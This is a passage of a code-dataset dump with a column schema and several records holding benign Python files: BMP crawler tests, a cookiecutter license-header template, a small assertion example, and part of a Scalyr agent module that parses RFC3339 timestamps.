hexsha
string | size
int64 | ext
string | lang
string | max_stars_repo_path
string | max_stars_repo_name
string | max_stars_repo_head_hexsha
string | max_stars_repo_licenses
list | max_stars_count
int64 | max_stars_repo_stars_event_min_datetime
string | max_stars_repo_stars_event_max_datetime
string | max_issues_repo_path
string | max_issues_repo_name
string | max_issues_repo_head_hexsha
string | max_issues_repo_licenses
list | max_issues_count
int64 | max_issues_repo_issues_event_min_datetime
string | max_issues_repo_issues_event_max_datetime
string | max_forks_repo_path
string | max_forks_repo_name
string | max_forks_repo_head_hexsha
string | max_forks_repo_licenses
list | max_forks_count
int64 | max_forks_repo_forks_event_min_datetime
string | max_forks_repo_forks_event_max_datetime
string | content
string | avg_line_length
float64 | max_line_length
int64 | alphanum_fraction
float64 | qsc_code_num_words_quality_signal
int64 | qsc_code_num_chars_quality_signal
float64 | qsc_code_mean_word_length_quality_signal
float64 | qsc_code_frac_words_unique_quality_signal
float64 | qsc_code_frac_chars_top_2grams_quality_signal
float64 | qsc_code_frac_chars_top_3grams_quality_signal
float64 | qsc_code_frac_chars_top_4grams_quality_signal
float64 | qsc_code_frac_chars_dupe_5grams_quality_signal
float64 | qsc_code_frac_chars_dupe_6grams_quality_signal
float64 | qsc_code_frac_chars_dupe_7grams_quality_signal
float64 | qsc_code_frac_chars_dupe_8grams_quality_signal
float64 | qsc_code_frac_chars_dupe_9grams_quality_signal
float64 | qsc_code_frac_chars_dupe_10grams_quality_signal
float64 | qsc_code_frac_chars_replacement_symbols_quality_signal
float64 | qsc_code_frac_chars_digital_quality_signal
float64 | qsc_code_frac_chars_whitespace_quality_signal
float64 | qsc_code_size_file_byte_quality_signal
float64 | qsc_code_num_lines_quality_signal
float64 | qsc_code_num_chars_line_max_quality_signal
float64 | qsc_code_num_chars_line_mean_quality_signal
float64 | qsc_code_frac_chars_alphabet_quality_signal
float64 | qsc_code_frac_chars_comments_quality_signal
float64 | qsc_code_cate_xml_start_quality_signal
float64 | qsc_code_frac_lines_dupe_lines_quality_signal
float64 | qsc_code_cate_autogen_quality_signal
float64 | qsc_code_frac_lines_long_string_quality_signal
float64 | qsc_code_frac_chars_string_length_quality_signal
float64 | qsc_code_frac_chars_long_word_length_quality_signal
float64 | qsc_code_frac_lines_string_concat_quality_signal
float64 | qsc_code_cate_encoded_data_quality_signal
float64 | qsc_code_frac_chars_hex_words_quality_signal
float64 | qsc_code_frac_lines_prompt_comments_quality_signal
float64 | qsc_code_frac_lines_assert_quality_signal
float64 | qsc_codepython_cate_ast_quality_signal
float64 | qsc_codepython_frac_lines_func_ratio_quality_signal
float64 | qsc_codepython_cate_var_zero_quality_signal
bool | qsc_codepython_frac_lines_pass_quality_signal
float64 | qsc_codepython_frac_lines_import_quality_signal
float64 | qsc_codepython_frac_lines_simplefunc_quality_signal
float64 | qsc_codepython_score_lines_no_logic_quality_signal
float64 | qsc_codepython_frac_lines_print_quality_signal
float64 | qsc_code_num_words
int64 | qsc_code_num_chars
int64 | qsc_code_mean_word_length
int64 | qsc_code_frac_words_unique
null | qsc_code_frac_chars_top_2grams
int64 | qsc_code_frac_chars_top_3grams
int64 | qsc_code_frac_chars_top_4grams
int64 | qsc_code_frac_chars_dupe_5grams
int64 | qsc_code_frac_chars_dupe_6grams
int64 | qsc_code_frac_chars_dupe_7grams
int64 | qsc_code_frac_chars_dupe_8grams
int64 | qsc_code_frac_chars_dupe_9grams
int64 | qsc_code_frac_chars_dupe_10grams
int64 | qsc_code_frac_chars_replacement_symbols
int64 | qsc_code_frac_chars_digital
int64 | qsc_code_frac_chars_whitespace
int64 | qsc_code_size_file_byte
int64 | qsc_code_num_lines
int64 | qsc_code_num_chars_line_max
int64 | qsc_code_num_chars_line_mean
int64 | qsc_code_frac_chars_alphabet
int64 | qsc_code_frac_chars_comments
int64 | qsc_code_cate_xml_start
int64 | qsc_code_frac_lines_dupe_lines
int64 | qsc_code_cate_autogen
int64 | qsc_code_frac_lines_long_string
int64 | qsc_code_frac_chars_string_length
int64 | qsc_code_frac_chars_long_word_length
int64 | qsc_code_frac_lines_string_concat
null | qsc_code_cate_encoded_data
int64 | qsc_code_frac_chars_hex_words
int64 | qsc_code_frac_lines_prompt_comments
int64 | qsc_code_frac_lines_assert
int64 | qsc_codepython_cate_ast
int64 | qsc_codepython_frac_lines_func_ratio
int64 | qsc_codepython_cate_var_zero
int64 | qsc_codepython_frac_lines_pass
int64 | qsc_codepython_frac_lines_import
int64 | qsc_codepython_frac_lines_simplefunc
int64 | qsc_codepython_score_lines_no_logic
int64 | qsc_codepython_frac_lines_print
int64 | effective
string | hits
int64 |
|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|
fe3610d7e57f19aa8e5fe414a87d307b61838ada
| 6,632
|
py
|
Python
|
tests/Crawler_bmp_tests.py
|
LukasTinnes/sPyRat
|
42e012e426befa3876e590be2ea83874d5351d12
|
[
"Unlicense"
] | null | null | null |
tests/Crawler_bmp_tests.py
|
LukasTinnes/sPyRat
|
42e012e426befa3876e590be2ea83874d5351d12
|
[
"Unlicense"
] | 3
|
2022-02-07T19:53:47.000Z
|
2022-02-13T19:51:33.000Z
|
tests/Crawler_bmp_tests.py
|
LukasTinnes/sPyRat
|
42e012e426befa3876e590be2ea83874d5351d12
|
[
"Unlicense"
] | null | null | null |
from crawling.crawlers.file_crawlers.bmp.bmp_crawler import BMPCrawler
import os
import pytest
PATH_PDN = "files\\bmp\\paintdotnet\\"
PATH_PAINT = "files\\bmp\\paint\\"
PATH_GIMP = "files\\bmp\\gimp\\"
PATH_WIKI = "files\\bmp\\wiki\\"
PATH_EXTRA = "files\\bmp\\extra\\"
POOLS = 4
PATTERN = "bmp"
### PAINT.NET tests
def test_pdn_32bpp_bmp():
crawler = BMPCrawler(POOLS, PATTERN)
frame = crawler.crawl(PATH_PDN + "4Pix_32.bmp")
assert frame.get_data_frame().shape[0] == 1
assert (frame.get_data_frame()["size"]).iloc[0] == os.path.getsize(PATH_PDN + "4Pix_32.bmp")
def test_pdn_24bpp_bmp():
crawler = BMPCrawler(POOLS, PATTERN)
frame = crawler.crawl(PATH_PDN + "4Pix_24.bmp")
assert frame.get_data_frame().shape[0] == 1
assert (frame.get_data_frame()["size"]).iloc[0] == os.path.getsize(PATH_PDN + "4Pix_24.bmp")
def test_pdn_8bpp_bmp():
crawler = BMPCrawler(POOLS, PATTERN)
frame = crawler.crawl(PATH_PDN + "4Pix_8.bmp")
assert frame.get_data_frame().shape[0] == 1
assert (frame.get_data_frame()["size"]).iloc[0] == os.path.getsize(PATH_PDN + "4Pix_8.bmp")
def test_pdn_4bpp_bmp():
crawler = BMPCrawler(POOLS, PATTERN)
frame = crawler.crawl(PATH_PDN + "4Pix_4.bmp")
assert frame.get_data_frame().shape[0] == 1
assert (frame.get_data_frame()["size"]).iloc[0] == os.path.getsize(PATH_PDN + "4Pix_4.bmp")
def test_pdn_1bpp_bmp():
"""
Ok so this is complicated.
For some reason Paint.NET gives two bits per pixel when you select 1.
Is there a good reason for this?
:return:
"""
crawler = BMPCrawler(POOLS, PATTERN)
frame = crawler.crawl(PATH_PDN + "4Pix_1.bmp")
assert frame.get_data_frame().shape[0] == 1
assert (frame.get_data_frame()["size"]).iloc[0] == os.path.getsize(PATH_PDN + "4Pix_1.bmp")
# GIMP TESTS
def test_gimp_R5G6B5_bmp():
crawler = BMPCrawler(POOLS, PATTERN)
frame = crawler.crawl(PATH_GIMP + "4Pix_R5G6B5.bmp")
assert frame.get_data_frame().shape[0] == 1
assert (frame.get_data_frame()["size"]).iloc[0] == os.path.getsize(PATH_GIMP + "4Pix_R5G6B5.bmp")
def test_gimp_R8G8B8_bmp():
crawler = BMPCrawler(POOLS, PATTERN)
frame = crawler.crawl(PATH_GIMP + "4Pix_R8G8B8.bmp")
assert frame.get_data_frame().shape[0] == 1
assert (frame.get_data_frame()["size"]).iloc[0] == os.path.getsize(PATH_GIMP + "4Pix_R8G8B8.bmp")
def test_gimp_X1R5G5B5_bmp():
crawler = BMPCrawler(POOLS, PATTERN)
frame = crawler.crawl(PATH_GIMP+ "4Pix_X1R5G5B5.bmp")
assert frame.get_data_frame().shape[0] == 1
assert (frame.get_data_frame()["size"]).iloc[0] == os.path.getsize(PATH_GIMP + "4Pix_X1R5G5B5.bmp")
def test_gimp_X8R8G8B8_bmp():
crawler = BMPCrawler(POOLS, PATTERN)
frame = crawler.crawl(PATH_GIMP + "4Pix_X8R8G8B8.bmp")
assert frame.get_data_frame().shape[0] == 1
assert (frame.get_data_frame()["size"]).iloc[0] == os.path.getsize(PATH_GIMP + "4Pix_X8R8G8B8.bmp")
# "Farbraum nicht mit schreiben" was selected for these.
def test_gimp_R5G6B5_no_color_bmp():
crawler = BMPCrawler(POOLS, PATTERN)
frame = crawler.crawl(PATH_GIMP + "4Pix_R5G6B5_no_color.bmp")
assert frame.get_data_frame().shape[0] == 1
assert (frame.get_data_frame()["size"]).iloc[0] == os.path.getsize(PATH_GIMP + "4Pix_R5G6B5_no_color.bmp")
def test_gimp_R8G8B8_no_color_bmp():
crawler = BMPCrawler(POOLS, PATTERN)
frame = crawler.crawl(PATH_GIMP + "4Pix_R8G8B8_no_color.bmp")
assert frame.get_data_frame().shape[0] == 1
assert (frame.get_data_frame()["size"]).iloc[0] == os.path.getsize(PATH_GIMP + "4Pix_R8G8B8_no_color.bmp")
def test_gimp_X1R5G5B5_no_color_bmp():
crawler = BMPCrawler(POOLS, PATTERN)
frame = crawler.crawl(PATH_GIMP+ "4Pix_X1R5G5B5_no_color.bmp")
assert frame.get_data_frame().shape[0] == 1
assert (frame.get_data_frame()["size"]).iloc[0] == os.path.getsize(PATH_GIMP + "4Pix_X1R5G5B5_no_color.bmp")
def test_gimp_X8R8G8B8_no_color_bmp():
crawler = BMPCrawler(POOLS, PATTERN)
frame = crawler.crawl(PATH_GIMP + "4Pix_X8R8G8B8_no_color.bmp")
assert frame.get_data_frame().shape[0] == 1
assert (frame.get_data_frame()["size"]).iloc[0] == os.path.getsize(PATH_GIMP + "4Pix_X8R8G8B8_no_color.bmp")
# PAINT TESTS
def test_paint_1_bmp():
crawler = BMPCrawler(POOLS, PATTERN)
frame = crawler.crawl(PATH_PAINT + "4Pix_1.bmp")
assert frame.get_data_frame().shape[0] == 1
assert (frame.get_data_frame()["size"]).iloc[0] == os.path.getsize(PATH_PAINT + "4Pix_1.bmp")
def test_paint_16_bmp():
crawler = BMPCrawler(POOLS, PATTERN)
frame = crawler.crawl(PATH_PAINT + "4Pix_16.bmp")
assert frame.get_data_frame().shape[0] == 1
assert (frame.get_data_frame()["size"]).iloc[0] == os.path.getsize(PATH_PAINT + "4Pix_16.bmp")
def test_paint_24_bmp():
crawler = BMPCrawler(POOLS, PATTERN)
frame = crawler.crawl(PATH_PAINT + "4Pix_24.bmp")
assert frame.get_data_frame().shape[0] == 1
assert frame.get_data_frame()["size"].iloc[0] == os.path.getsize(PATH_PAINT + "4Pix_24.bmp")
def test_paint_256_depth_bmp():
"""
Ok so for some reason there is apparently a difference between saving in 24 bit and 256 color depth
even though that should be the exact same thing????????? IT HAS A KLIOBYTE OF DATA ?????????????
:return:
"""
crawler = BMPCrawler(POOLS, PATTERN)
frame = crawler.crawl(PATH_PAINT + "4Pix_256.bmp")
assert frame.get_data_frame().shape[0] == 1
assert (frame.get_data_frame()["size"]).iloc[0] == os.path.getsize(PATH_PAINT + "4Pix_256.bmp")
# Wikipedia Tests
def test_wiki_ex1_bmp():
crawler = BMPCrawler(POOLS, PATTERN)
frame = crawler.crawl(PATH_WIKI + "wiki_1.bmp")
assert frame.get_data_frame().shape[0] == 1
assert (frame.get_data_frame()["size"]).iloc[0] == os.path.getsize(PATH_WIKI + "wiki_1.bmp")
# Misc functions test.
def test_wiki_ex1_bmp_0():
crawler = BMPCrawler(POOLS, PATTERN)
frame = crawler.crawl_at_byte(PATH_WIKI + "wiki_1.bmp")
assert frame.get_data_frame().shape[0] == 1
assert (frame.get_data_frame()["size"]).iloc[0] == os.path.getsize(PATH_WIKI + "wiki_1.bmp")
def test_wiki_ex1_bmp_1():
crawler = BMPCrawler(POOLS, PATTERN)
frame = crawler.crawl_at_byte(PATH_WIKI + "wiki_1.bmp", 1)
assert frame.get_data_frame().shape[0] == 0
# Slow tests
@pytest.mark.slow
def test_hd_bmp():
crawler = BMPCrawler(POOLS, PATTERN)
frame = crawler.crawl(PATH_EXTRA + "synth spiral.bmp")
assert frame.get_data_frame().shape[0] == 1
assert (frame.get_data_frame()["size"]).iloc[0] == os.path.getsize(PATH_EXTRA + "synth spiral.bmp")
| 36.844444
| 113
| 0.695718
| 1,006
| 6,632
| 4.326044
| 0.111332
| 0.103631
| 0.131893
| 0.169577
| 0.827895
| 0.773438
| 0.765625
| 0.74977
| 0.74977
| 0.723575
| 0
| 0.043024
| 0.148372
| 6,632
| 179
| 114
| 37.050279
| 0.727514
| 0.073432
| 0
| 0.373913
| 0
| 0
| 0.12882
| 0.03697
| 0
| 0
| 0
| 0
| 0.356522
| 1
| 0.182609
| false
| 0
| 0.026087
| 0
| 0.208696
| 0
| 0
| 0
| 0
| null | 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
fea225f07b4fffab3dcf6ee4cd48e297176f53b4
| 1,910
|
py
|
Python
|
{{cookiecutter.project_name}}/{{cookiecutter.project_slug}}/__init__.py
|
node13h/cookiecutter-python3
|
3c0864497b52b0fa3b2dcb6f31b18a8cf02d80ee
|
[
"MIT"
] | null | null | null |
{{cookiecutter.project_name}}/{{cookiecutter.project_slug}}/__init__.py
|
node13h/cookiecutter-python3
|
3c0864497b52b0fa3b2dcb6f31b18a8cf02d80ee
|
[
"MIT"
] | null | null | null |
{{cookiecutter.project_name}}/{{cookiecutter.project_slug}}/__init__.py
|
node13h/cookiecutter-python3
|
3c0864497b52b0fa3b2dcb6f31b18a8cf02d80ee
|
[
"MIT"
] | null | null | null |
{% if cookiecutter.open_source_license == 'MIT' -%}
# MIT license
# Copyright {% now 'local', '%Y' %}, {{ cookiecutter.project_author }} <{{ cookiecutter.project_author_email }}>
{% elif cookiecutter.open_source_license == 'GPLv3' -%}
# {{ cookiecutter.project_description }}
# Copyright (C) {% now 'local', '%Y' %}, {{ cookiecutter.project_author }} <{{ cookiecutter.project_author_email }}>
# This program is free software: you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
# You should have received a copy of the GNU General Public License
# along with this program. If not, see <https://www.gnu.org/licenses/>.
{% elif cookiecutter.open_source_license == 'AGPLv3' -%}
# {{ cookiecutter.project_description }}
# Copyright (C) {% now 'local', '%Y' %}, {{ cookiecutter.project_author }} <{{ cookiecutter.project_author_email }}>
# This program is free software: you can redistribute it and/or modify
# it under the terms of the GNU Affero General Public License as
# published by the Free Software Foundation, either version 3 of the
# License, or (at your option) any later version.
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU Affero General Public License for more details.
# You should have received a copy of the GNU Affero General Public License
# along with this program. If not, see <https://www.gnu.org/licenses/>.
{% endif -%}
| 51.621622
| 116
| 0.741361
| 273
| 1,910
| 5.124542
| 0.304029
| 0.108649
| 0.107219
| 0.062187
| 0.950679
| 0.903503
| 0.899214
| 0.890636
| 0.890636
| 0.890636
| 0
| 0.002491
| 0.159162
| 1,910
| 36
| 117
| 53.055556
| 0.868618
| 0.875916
| 0
| 0
| 0
| 0
| 0.066667
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | null | 0
| 0
| null | null | 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 8
|
2299444ea1e38c1263f8d6cd0b20f3afe0bbead0
| 263
|
py
|
Python
|
tests/basic/assert.py
|
Fryguy/py2rb
|
0d2fbc5a86b82707a1d83241a21af6b2cc22c0b8
|
[
"MIT"
] | 124
|
2017-08-19T05:37:16.000Z
|
2022-03-08T18:24:18.000Z
|
tests/basic/assert.py
|
JeMaMokuma/py2rb
|
0d2fbc5a86b82707a1d83241a21af6b2cc22c0b8
|
[
"MIT"
] | 15
|
2017-12-16T05:59:31.000Z
|
2022-02-08T02:51:17.000Z
|
tests/basic/assert.py
|
JeMaMokuma/py2rb
|
0d2fbc5a86b82707a1d83241a21af6b2cc22c0b8
|
[
"MIT"
] | 18
|
2017-09-25T11:57:04.000Z
|
2022-02-19T17:33:48.000Z
|
try:
assert True, "no message"
except AssertionError as err:
print('AssertionError :', err)
except:
print('Error :')
try:
assert False, "error message"
except AssertionError as err:
print('AssertionError :', err)
except:
print('Error :')
| 18.785714
| 34
| 0.661597
| 30
| 263
| 5.8
| 0.4
| 0.103448
| 0.310345
| 0.333333
| 0.804598
| 0.804598
| 0.804598
| 0.804598
| 0.804598
| 0.804598
| 0
| 0
| 0.209125
| 263
| 13
| 35
| 20.230769
| 0.836538
| 0
| 0
| 0.833333
| 0
| 0
| 0.262357
| 0
| 0
| 0
| 0
| 0
| 0.5
| 1
| 0
| true
| 0
| 0
| 0
| 0
| 0.333333
| 0
| 0
| 0
| null | 0
| 1
| 1
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
|
0
| 11
|
22ba02d7f072d942a4fe2bf565f12876c459d192
| 15,652
|
py
|
Python
|
scalyr_agent/date_parsing_utils.py
|
Kami/scalyr-agent-2
|
b26ebb6a74c2670ae28052079f2fac95d88e832a
|
[
"Apache-2.0"
] | null | null | null |
scalyr_agent/date_parsing_utils.py
|
Kami/scalyr-agent-2
|
b26ebb6a74c2670ae28052079f2fac95d88e832a
|
[
"Apache-2.0"
] | 1
|
2020-06-03T13:19:37.000Z
|
2020-06-03T13:35:28.000Z
|
scalyr_agent/date_parsing_utils.py
|
Kami/scalyr-agent-2
|
b26ebb6a74c2670ae28052079f2fac95d88e832a
|
[
"Apache-2.0"
] | null | null | null |
# Copyright 2014-2020 Scalyr Inc.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""
Module containing various date parsing related utility functions.
"""
from __future__ import absolute_import
if False:
from typing import Optional
import re
import time
import calendar
import datetime
import six
from six.moves import map
try:
import udatetime
except ImportError:
# if udatetime is not available, we fall back to the second fastest approach for date parsing
# (string.split approach)
udatetime = None
from scalyr_agent.compat import custom_any as any
if six.PY3:
# re.ASCII makes this regex only match ASCII digits which is tiny bit faster than the version
# without re.ASCII flag
RFC3339_STR_REGEX = re.compile(
r"(\d{4})-(\d{2})-(\d{2})T(\d{2}):(\d{2}):(\d{2})", re.ASCII
)
else:
RFC3339_STR_REGEX = re.compile(r"(\d{4})-(\d{2})-(\d{2})T(\d{2}):(\d{2}):(\d{2})")
# Private versions of datetime parsing functions are below. Those are not used by the production
# code, but there are there so we can test corectness of all the functions and benchmark different
# implementations and compare them.
def _rfc3339_to_nanoseconds_since_epoch_strptime(string):
# type: (str) -> Optional[int]
"""
rfc3339_to_nanoseconds_since_epoch variation which utilizes strptime approach.
"""
# split the string in to main time and fractional component
parts = string.split(".")
# it's possible that the time does not have a fractional component
# e.g 2015-08-03T09:12:43Z, in this case 'parts' will only have a
# single element that should end in Z. Strip the Z if it exists
# so we can use the same format string for processing the main
# date+time regardless of whether the time has a fractional component.
if parts[0].endswith("Z"):
parts[0] = parts[0][:-1]
try:
tm = time.strptime(parts[0], "%Y-%m-%dT%H:%M:%S")
except ValueError:
return None
nano_seconds = int(calendar.timegm(tm[0:6])) * 1000000000
nanos = 0
# now add the fractional part
if len(parts) > 1:
fractions = parts[1]
# if the fractional part doesn't end in Z we likely have a
# malformed time, so just return the current value
if not fractions.endswith("Z"):
# we don't handle non UTC timezones yet
if any(c in fractions for c in "+-"):
return None
return nano_seconds
# strip the final 'Z' and use the final number for processing
fractions = fractions[:-1]
to_nanos = 9 - len(fractions)
nanos = int(int(fractions) * 10 ** to_nanos)
return nano_seconds + nanos
def _rfc3339_to_nanoseconds_since_epoch_regex(string):
# type: (str) -> Optional[int]
"""
rfc3339_to_nanoseconds_since_epoch variation which utilizes regex approach.
"""
# split the string in to main time and fractional component
parts = string.split(".")
# it's possible that the time does not have a fractional component
# e.g 2015-08-03T09:12:43Z, in this case 'parts' will only have a
# single element that should end in Z. Strip the Z if it exists
# so we can use the same format string for processing the main
# date+time regardless of whether the time has a fractional component.
if parts[0].endswith("Z"):
parts[0] = parts[0][:-1]
try:
dt = datetime.datetime(
*list(map(int, RFC3339_STR_REGEX.match(parts[0]).groups())) # type: ignore
)
except Exception:
return None
nano_seconds = (
calendar.timegm((dt.year, dt.month, dt.day, dt.hour, dt.minute, dt.second))
* 1000000000
)
nanos = 0
# now add the fractional part
if len(parts) > 1:
fractions = parts[1]
# if the fractional part doesn't end in Z we likely have a
# malformed time, so just return the current value
if not fractions.endswith("Z"):
# we don't handle non UTC timezones yet
if any(c in fractions for c in "+-"):
return None
return nano_seconds
# strip the final 'Z' and use the final number for processing
fractions = fractions[:-1]
to_nanos = 9 - len(fractions)
nanos = int(int(fractions) * 10 ** to_nanos)
return nano_seconds + nanos
def _rfc3339_to_nanoseconds_since_epoch_string_split(string):
# type: (str) -> Optional[int]
"""
rfc3339_to_nanoseconds_since_epoch variation which utilizes string.split approach.
Returns nanoseconds from unix epoch from a rfc3339 formatted timestamp.
This doesn't do any complex testing and assumes the string is well formed and in UTC (e.g.
uses Z at the end rather than a time offset).
@param string: a date/time in rfc3339 format, e.g. 2015-08-03T09:12:43.143757463Z
@rtype int
"""
# split the string in to main time and fractional component
parts = string.split(".")
# it's possible that the time does not have a fractional component
# e.g 2015-08-03T09:12:43Z, in this case 'parts' will only have a
# single element that should end in Z. Strip the Z if it exists
# so we can use the same format string for processing the main
# date+time regardless of whether the time has a fractional component.
if parts[0].endswith("Z"):
parts[0] = parts[0][:-1]
try:
date_parts, time_parts = parts[0].split("T")
date_parts = date_parts.split("-") # type: ignore
time_parts = time_parts.split(":") # type: ignore
dt = datetime.datetime(
int(date_parts[0]),
int(date_parts[1]),
int(date_parts[2]),
int(time_parts[0]),
int(time_parts[1]),
int(time_parts[2]),
)
except Exception:
return None
nano_seconds = (
calendar.timegm((dt.year, dt.month, dt.day, dt.hour, dt.minute, dt.second))
* 1000000000
)
nanos = 0
# now add the fractional part
if len(parts) > 1:
fractions = parts[1]
# if the fractional part doesn't end in Z we likely have a
# malformed time, so just return the current value
if not fractions.endswith("Z"):
# we don't handle non UTC timezones yet
if any(c in fractions for c in "+-"):
return None
return nano_seconds
# strip the final 'Z' and use the final number for processing
fractions = fractions[:-1]
to_nanos = 9 - len(fractions)
nanos = int(int(fractions) * 10 ** to_nanos)
return nano_seconds + nanos
def _rfc3339_to_nanoseconds_since_epoch_udatetime(string):
"""
rfc3339_to_nanoseconds_since_epoch variation which utilizes udatetime library.
"""
# split the string in to main time and fractional component
parts = string.split(".")
# it's possible that the time does not have a fractional component
# e.g 2015-08-03T09:12:43Z, in this case 'parts' will only have a
# single element that should end in Z. Strip the Z if it exists
# so we can use the same format string for processing the main
# date+time regardless of whether the time has a fractional component.
if parts[0].endswith("Z"):
parts[0] = parts[0][:-1]
try:
dt = udatetime.from_string(parts[0])
except ValueError:
return None
nano_seconds = (
calendar.timegm((dt.year, dt.month, dt.day, dt.hour, dt.minute, dt.second))
* 1000000000
)
nanos = 0
# now add the fractional part
if len(parts) > 1:
fractions = parts[1]
# if the fractional part doesn't end in Z we likely have a
# malformed time, so just return the current value
if not fractions.endswith("Z"):
# we don't handle non UTC timezones yet
if any(c in fractions for c in "+-"):
return None
return nano_seconds
# strip the final 'Z' and use the final number for processing
fractions = fractions[:-1]
to_nanos = 9 - len(fractions)
nanos = int(int(fractions) * 10 ** to_nanos)
return nano_seconds + nanos
def _rfc3339_to_datetime_strptime(string):
# type: (str) -> Optional[datetime.datetime]
"""
rfc3339_to_datetime variation which utilizes strptime approach.
"""
# split the string in to main time and fractional component
parts = string.split(".")
# it's possible that the time does not have a fractional component
# e.g 2015-08-03T09:12:43Z, in this case 'parts' will only have a
# single element that should end in Z. Strip the Z if it exists
# so we can use the same format string for processing the main
# date+time regardless of whether the time has a fractional component.
if parts[0].endswith("Z"):
parts[0] = parts[0][:-1]
# create a datetime object
try:
tm = time.strptime(parts[0], "%Y-%m-%dT%H:%M:%S")
except ValueError:
return None
dt = datetime.datetime(*(tm[0:6]))
# now add the fractional part
if len(parts) > 1:
fractions = parts[1]
# if we had a fractional component it should terminate in a Z
if not fractions.endswith("Z"):
# we don't handle non UTC timezones yet
if any(c in fractions for c in "+-"):
return None
return dt
# remove the Z and just process the fraction.
fractions = fractions[:-1]
to_micros = 6 - len(fractions)
micro = int(int(fractions) * 10 ** to_micros)
dt = dt.replace(microsecond=micro)
return dt
def _rfc3339_to_datetime_regex(string):
# type: (str) -> Optional[datetime.datetime]
"""
rfc3339_to_datetime variation which utilizes regex approach.
"""
# split the string in to main time and fractional component
parts = string.split(".")
# it's possible that the time does not have a fractional component
# e.g 2015-08-03T09:12:43Z, in this case 'parts' will only have a
# single element that should end in Z. Strip the Z if it exists
# so we can use the same format string for processing the main
# date+time regardless of whether the time has a fractional component.
if parts[0].endswith("Z"):
parts[0] = parts[0][:-1]
# create a datetime object
try:
dt = datetime.datetime(
*list(map(int, RFC3339_STR_REGEX.match(parts[0]).groups())) # type: ignore
)
except Exception:
return None
# now add the fractional part
if len(parts) > 1:
fractions = parts[1]
# if we had a fractional component it should terminate in a Z
if not fractions.endswith("Z"):
# we don't handle non UTC timezones yet
if any(c in fractions for c in "+-"):
return None
return dt
# remove the Z and just process the fraction.
fractions = fractions[:-1]
to_micros = 6 - len(fractions)
micro = int(int(fractions) * 10 ** to_micros)
dt = dt.replace(microsecond=micro)
return dt
def _rfc3339_to_datetime_string_split(string):
# type: (str) -> Optional[datetime.datetime]
"""
rfc3339_to_datetime variation which utilizes string.split approach.
Returns a date time from a rfc3339 formatted timestamp.
This doesn't do any complex testing and assumes the string is well formed and in UTC (e.g.
uses Z at the end rather than a time offset).
@param string: a date/time in rfc3339 format, e.g. 2015-08-03T09:12:43.143757463Z
@rtype datetime.datetime
"""
# split the string in to main time and fractional component
parts = string.split(".")
# it's possible that the time does not have a fractional component
# e.g 2015-08-03T09:12:43Z, in this case 'parts' will only have a
# single element that should end in Z. Strip the Z if it exists
# so we can use the same format string for processing the main
# date+time regardless of whether the time has a fractional component.
if parts[0].endswith("Z"):
parts[0] = parts[0][:-1]
# create a datetime object
try:
date_parts, time_parts = parts[0].split("T")
date_parts = date_parts.split("-") # type: ignore
time_parts = time_parts.split(":") # type: ignore
dt = datetime.datetime(
int(date_parts[0]),
int(date_parts[1]),
int(date_parts[2]),
int(time_parts[0]),
int(time_parts[1]),
int(time_parts[2]),
)
except Exception:
return None
# now add the fractional part
if len(parts) > 1:
fractions = parts[1]
# if we had a fractional component it should terminate in a Z
if not fractions.endswith("Z"):
# we don't handle non UTC timezones yet
if any(c in fractions for c in "+-"):
return None
return dt
# remove the Z and just process the fraction.
fractions = fractions[:-1]
to_micros = 6 - len(fractions)
micro = int(int(fractions) * 10 ** to_micros)
dt = dt.replace(microsecond=micro)
return dt
def _rfc3339_to_datetime_udatetime(string):
# type: (str) -> Optional[datetime.datetime]
"""
rfc3339_to_datetime variation which utilizes udatetime library.
"""
# split the string in to main time and fractional component
parts = string.split(".")
# it's possible that the time does not have a fractional component
# e.g 2015-08-03T09:12:43Z, in this case 'parts' will only have a
# single element that should end in Z. Strip the Z if it exists
# so we can use the same format string for processing the main
# date+time regardless of whether the time has a fractional component.
if parts[0].endswith("Z"):
parts[0] = parts[0][:-1]
# create a datetime object
try:
dt = udatetime.from_string(parts[0])
# NOTE: At this point we don't support timezones
dt = dt.replace(tzinfo=None)
except ValueError:
return None
# now add the fractional part
if len(parts) > 1:
fractions = parts[1]
# if we had a fractional component it should terminate in a Z
if not fractions.endswith("Z"):
# we don't handle non UTC timezones yet
if any(c in fractions for c in "+-"):
return None
return dt
# remove the Z and just process the fraction.
fractions = fractions[:-1]
to_micros = 6 - len(fractions)
micro = int(int(fractions) * 10 ** to_micros)
# NOTE(Tomaz): dt.replace is quite slow...
